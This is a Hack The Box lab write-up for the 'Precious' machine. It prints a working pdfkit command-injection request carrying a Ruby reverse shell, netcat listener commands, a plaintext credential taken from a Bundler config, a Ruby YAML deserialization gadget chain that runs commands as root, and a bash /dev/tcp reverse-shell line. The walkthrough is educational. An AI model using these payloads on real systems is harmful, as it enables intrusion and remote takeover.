Breaking in before the VPN broke down - A Journey through Precious (HTB Writeup)

Posted on Aug 6, 2025 9 mins

Hackthebox Pdfkit Ruby Yaml Deserialization Command-Injection Reverse-Shell Linux Privilege Escalation Vpn Troubleshooting

Hey folks, hope you’re doing great. This was my second box of the week: Precious.

It’s listed as an Easy Linux box - and while the user flag came quickly, the root part had some twists. To make things more exciting, my VPN started dying halfway through. More on that later.

I picked this one because of the consistent “Easy” ratings on HTB. That usually means solid fundamentals and a chance to practice clean enumeration and exploitation.

Enumeration

I started with a basic top 2000 ports scan:

nmap --top-ports 2000 -sV -sC -sS 10.129.228.98

Result:

...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian
80/tcp open  http    nginx 1.18.0 + Phusion Passenger 6.0.15
...

Two services: SSH and a web server running Nginx with Phusion Passenger. As always, I added the hostname for easier access:

echo "10.129.228.98 precious.htb" | sudo tee -a /etc/hosts

Browsing to http://precious.htb gave me a simple webpage with a PDF converter form.

Converting Webpages to PDF

The interface let you enter a URL, and it would supposedly convert the content at that URL into a PDF.

First test: I submitted the German Wikipedia homepage:

https://de.wikipedia.org/wiki/Wikipedia:Hauptseite

The result was an error - the converter couldn’t load the remote URL. I tried a few others, including direct PDF links, but the issue persisted.

This likely meant the service was running in an isolated network environment or using a restrictive configuration that prevented outbound requests.

Inspection with Burp

I captured the request with Burp Suite. The submitted URL was sent as a standard form field (url) in the POST body.

Seeing the raw parameter sparked the wrong idea at first: I assumed I could manipulate the input to perform some kind of injection - maybe abusing special URL characters or parameters.

I tried to conceal a payload using techniques from this PortSwigger article, such as encoding command injections into the username/password fields of a URL, but none of that worked.

Even though that didn’t pay off here, it’s still a valuable technique worth exploring in future scenarios.

When the VPN Died

At this point, my VPN started acting up. The connection dropped repeatedly. I tried restarting the VPN client multiple times, and when that failed, I switched to using HTB’s Pwnbox - which, thankfully, was more stable.

Since the server couldn’t reach the internet, I figured the only way to supply content would be to host it myself.

Hosting My Own HTTP Server

I spun up a local HTTP server with:

python -m http.server 8000

Then submitted a URL pointing to my own machine:

http://<MY_VM_IP>:8000

That worked. The application successfully downloaded the page and returned a PDF. Running pdfinfo on the downloaded file revealed something interesting:

pdfinfo 9e5zp98apzbgq1kbql4tzmfkymyx7c7o.pdf 

Creator:         Generated by pdfkit v0.8.6
Custom Metadata: no
Metadata Stream: yes
Tagged:          no
UserProperties:  no
Suspects:        no
Form:            none
JavaScript:      no
Pages:           1
Encrypted:       no
Page size:       612 x 792 pts (letter)
Page rot:        0
File size:       30049 bytes
Optimized:       no
PDF version:     1.4

This confirmed that the backend was using pdfkit v0.8.6 to generate the PDFs. pdfkit here is the Ruby gem (consistent with the Phusion Passenger stack from the scan), a wrapper around wkhtmltopdf, which renders HTML to PDF using a headless WebKit engine.
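If pdfinfo isn't at hand, the same fingerprint can often be pulled straight from the file. The snippet below is a minimal sketch, assuming the /Creator entry is stored as a plain literal string in the PDF; pdfinfo handles other encodings that this does not. The function name pdf_creator and the sample bytes are made up for illustration.

```python
import re
from typing import Optional


def pdf_creator(pdf_bytes: bytes) -> Optional[str]:
    """Return the /Creator value if it is stored as a plain (...) literal."""
    match = re.search(rb"/Creator\s*\(([^)]*)\)", pdf_bytes)
    if match is None:
        return None
    return match.group(1).decode("latin-1")


# Illustrative sample, not bytes taken from the real download.
sample = b"<< /Creator (Generated by pdfkit v0.8.6) /Producer (example) >>"
print(pdf_creator(sample))
```

On a real file you would pass in open(path, "rb").read() instead of the sample.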

Knowing the PDF was being generated via pdfkit opened up a path to command injection. The vulnerability is well-documented (CVE-2022-25765): vulnerable pdfkit versions, 0.8.6 included, pass user-supplied URLs to wkhtmltopdf without sanitizing them properly, so shell commands can be injected through URL parameters.

Exploiting PDFKit Command Injection

I used an exploit based on this GitHub repo: shamo0/PDFkit-CMD-Injection.

The idea is to craft a URL that looks legitimate to the parser but contains a payload that gets executed by the shell when wkhtmltopdf runs it.

To receive the shell, I set up:

python -m http.server 8000     # to serve the malicious payload
nc -lvnp 4444                  # to catch the reverse shell

Then, I crafted a POST request to the target, pointing to my own HTTP server and embedding a reverse shell payload in the query string.

curl 'http://precious.htb/' -X POST \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-raw 'url=http%3A%2F%2F<MY_VM_IP>%3A8000%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22<MY_VM_IP>%22%2C4444%29%29%27%60'

Payload Breakdown

Let’s unpack what’s going on inside that url= parameter. The critical part (once fully decoded) looks like this:

http://<MY_VM_IP>:8000/?name= ` ruby -rsocket -e 'spawn("sh",[:in,:out,:err]=>TCPSocket.new("<MY_VM_IP>",4444))' `

Step-by-step explanation:

1. Parameter abuse

We’re sending a URL to the server’s PDF converter. But instead of a legitimate URL, we embed shell execution characters directly into it - specifically using backticks:

` ruby -rsocket -e '...' `

Backticks are shell command substitution: when a string containing them is interpreted by a shell, the command inside is executed first. pdfkit builds the wkhtmltopdf command line from our URL, so if it hands this string to a shell unsanitized, the command inside the backticks gets executed.

2. Why Ruby?

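The stack (Phusion Passenger, and a service user named ruby, as it turned out) points to a Ruby application, so a Ruby interpreter is almost certainly available on the target. Ruby also allows one-liner reverse shells using the socket library: -rsocket loads the library and -e executes a Ruby expression.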

3. The actual Ruby reverse shell:

spawn("sh", [:in, :out, :err] => TCPSocket.new("<MY_VM_IP>", 4444))

spawn("sh", ...) starts a shell process.
[:in, :out, :err] => TCPSocket.new(...) redirects the shell’s input, output, and error streams to a TCP socket.
TCPSocket.new("<MY_VM_IP>", 4444) connects back to our machine (the attacker’s machine), where we are listening with nc -lvnp 4444.

This gives us an interactive shell over TCP - a basic reverse shell.

4. Double URL encoding

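Since the whole payload goes inside a form parameter, it has to be URL-encoded once. On top of that, the space right after name= is double-encoded (%2520): after the server decodes the form body, the URL still contains a literal %20 in front of the backtick, which is the shape the public proof of concept relies on. Everything else, backticks included (%60), is encoded only once.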
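To make the encoding layers less mysterious, here is a small sketch that rebuilds the form body from the decoded URL using Python's standard library. The address 10.10.14.2 is a hypothetical stand-in for <MY_VM_IP>, and the variable names are mine; the payload itself is the one from the curl command above.

```python
from urllib.parse import parse_qs, urlencode

ATTACKER_IP = "10.10.14.2"  # hypothetical, stands in for <MY_VM_IP>
HTTP_PORT = 8000
SHELL_PORT = 4444

# The Ruby one-liner, exactly as it should reach the shell.
ruby_cmd = (
    "ruby -rsocket -e'spawn(\"sh\",[:in,:out,:err]=>"
    f"TCPSocket.new(\"{ATTACKER_IP}\",{SHELL_PORT}))'"
)

# The URL as the application should see it after decoding the form body:
# note the literal %20 in front of the opening backtick.
inner_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/?name=%20` {ruby_cmd}`"

# Form-encoding turns the existing %20 into %2520 (the "double encoding"),
# spaces into +, and backticks into %60.
body = urlencode({"url": inner_url})
print(body)

# Decoding once, as the server does, gives back the inner URL unchanged.
assert parse_qs(body)["url"][0] == inner_url
```

The printed body has the same shape as the --data-raw value in the curl command, which makes it easy to see that only the %20 ends up encoded twice.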

Once submitted, and with the listener active, I received a callback:

Connection received on <MY_VM_IP>:4444

Boom, shell landed.

I had my shell - as the user running the web service (ruby).

Before We Escalate: Shell Stabilisation & Looking Around

Time to stabilize the shell and see what the ruby user can do.

First thought: check for sudo permissions.

ruby@precious:/home/henry$ sudo -l
We trust you have received the usual lecture from the local System Administrator...
[sudo] password for ruby:

No luck. No password, no privileges - at least not from this user.

Next step: poke around the user’s home directory.

ls -la /home/ruby

Among the usual .bashrc and .profile, one thing stood out:

dr-xr-xr-x 2 root ruby 4096 Oct 26  2022 .bundle

.bundle is part of Ruby’s dependency management - used by Bundler to store gem configs.

Opening up the config:

cat /home/ruby/.bundle/config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

There it is - plaintext credentials for the henry user. Worth a shot:

su - henry
Password:
henry@precious:~$

We’re in.
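Credentials stored like this follow a simple "user:password" pattern, so they are easy to hunt for across config files. The following is a rough sketch, assuming the value is a double-quoted string as in the config above; the helper name find_credentials and the regex are my own, not part of any Bundler tooling.

```python
import re

# Matches a trailing  : "user:password"  value on a config line.
CRED_LINE = re.compile(r':\s*"([^":]+):([^"]+)"\s*$')


def find_credentials(config_text):
    """Return (user, password) pairs found in quoted config values."""
    found = []
    for line in config_text.splitlines():
        match = CRED_LINE.search(line)
        if match:
            found.append((match.group(1), match.group(2)))
    return found


sample = '---\nBUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"\n'
print(find_credentials(sample))
```

Pointing something like this at every dotfile directory in /home is a cheap habit to build into post-exploitation enumeration.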

Privilege Escalation

Now as henry, we can check sudo -l again.

sudo -l

Output:

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

That’s it. henry can execute a specific Ruby script as root without a password. That’s exactly the kind of vector we need.

Let’s inspect the file:

cat /opt/update_dependencies.rb

Here’s the script:

require "yaml"
require 'rubygems'

def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }
        .map { |g| [g.name, g.version.to_s] }
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if file_name == local_name
            if file_version != local_version
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

Analyzing the Code

The script compares locally installed Ruby gems to a list specified in a dependencies.yml file. Critically, it uses this line:

YAML.load(File.read("dependencies.yml"))

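This is insecure deserialization - on older Psych versions (before 4.0), YAML.load() will instantiate arbitrary Ruby objects described in the document, which makes it dangerous on untrusted input. Instantiation alone isn’t code execution, but a carefully chained set of objects (a gadget chain) can trigger method calls that end in a system command.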

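The script opens dependencies.yml by relative path, so it reads whatever file of that name sits in the directory we run it from. If we place our own dependencies.yml in a directory we can write to and run the script from there via sudo, YAML.load() parses our file - as root.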
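The relative-path detail is what hands us control, and it isn't specific to Ruby. Here is a quick Python illustration (a sketch, with a temp directory standing in for a folder henry can write to) showing that a bare filename is resolved against the current working directory, not against the script's location:

```python
import os
import tempfile


def read_relative(name):
    # A bare filename is resolved against os.getcwd() at call time.
    with open(name) as fh:
        return fh.read()


with tempfile.TemporaryDirectory() as attacker_dir:
    # Whoever controls the working directory controls this file.
    with open(os.path.join(attacker_dir, "dependencies.yml"), "w") as fh:
        fh.write("attacker-controlled\n")

    previous = os.getcwd()
    os.chdir(attacker_dir)
    try:
        content = read_relative("dependencies.yml")
    finally:
        os.chdir(previous)

print(content)
```

An absolute path in the script (for example, one under /opt) would have closed this door.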

Ruby YAML Deserialization to RCE

This class of vulnerability is well-documented, e.g., in elttam’s Ruby YAML blog post. It allows you to define complex Ruby object graphs in YAML that end up triggering system commands.

Based on this payload gist, I crafted a malicious dependencies.yml to force code execution:

cat > dependencies.yml

Paste in whatever payload you need. E.g., I first had ls -la /root, and then:

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cat /root/root.txt
         method_id: :resolve

In short: we’re building a fake Ruby object structure that eventually calls Kernel.system("cat /root/root.txt").

Root Execution

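Now, from the directory containing our dependencies.yml, execute the script via sudo, using the exact command from the sudoers entry:

sudo /usr/bin/ruby /opt/update_dependencies.rb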

Output:

/root/root.txt
...
[stack trace noise]

Despite the stack trace, the command runs and we successfully read the root flag.

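Key learning: in Ruby, YAML.load() on untrusted input is just as dangerous as Python’s pickle (at least on Psych versions before 4.0, where load still instantiates arbitrary objects) - and in HTB boxes, it pays to check every time a script loads external files or configs via load. YAML.safe_load is the safer choice.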
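For readers who know Python better than Ruby, the pickle comparison can be made concrete. This is a deliberately harmless sketch: the class name Gadget is made up, and int stands in for whatever callable an attacker would really pick. It shows that loading a pickle can call a function chosen by whoever created the data:

```python
import pickle


class Gadget:
    def __reduce__(self):
        # Tells pickle: "to rebuild me, call int('1337')".
        # A real attack would name a far less friendly callable here.
        return (int, ("1337",))


blob = pickle.dumps(Gadget())

# The loader never sees a Gadget; it just calls what the blob tells it to.
result = pickle.loads(blob)
print(type(result).__name__, result)
```

The Ruby gadget chain above is more convoluted because it has to reach Kernel.system through existing classes, but the underlying problem is the same: the data decides which code runs.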

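Want a full root shell? Just change git_set to something like the line below. system() runs the string through /bin/sh, and the /dev/tcp redirect is a bash feature, so the command is wrapped in bash -c:

git_set: bash -c 'bash -i >& /dev/tcp/<MY_VM_IP>/4444 0>&1'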

and catch it with netcat.

Thoughts

This box was a ride - not just because of the PDF-to-reverse-shell vector, but because of how many moving pieces came together. From basic enumeration, to exploiting a lesser-known pdfkit command injection, to cracking open Ruby’s YAML deserialization quirks - this challenge forced me to pivot, learn fast, and adapt under pressure (literally, my VPN was falling apart mid-way through).

What I learned or reinforced:

Always check how external data is being parsed - especially with things like YAML.load() or anything passed into a PDF generation tool.
Ruby can be an incredibly flexible vector for both reverse shells and deserialization attacks - even if you’ve never used it before.
VPNs fail. Be ready to pivot to alternatives like Pwnbox or reconnect fast.

Advice to future players: Take the time to try different angles before peeking at hints or writeups. This box rewards exploration and a bit of lateral thinking.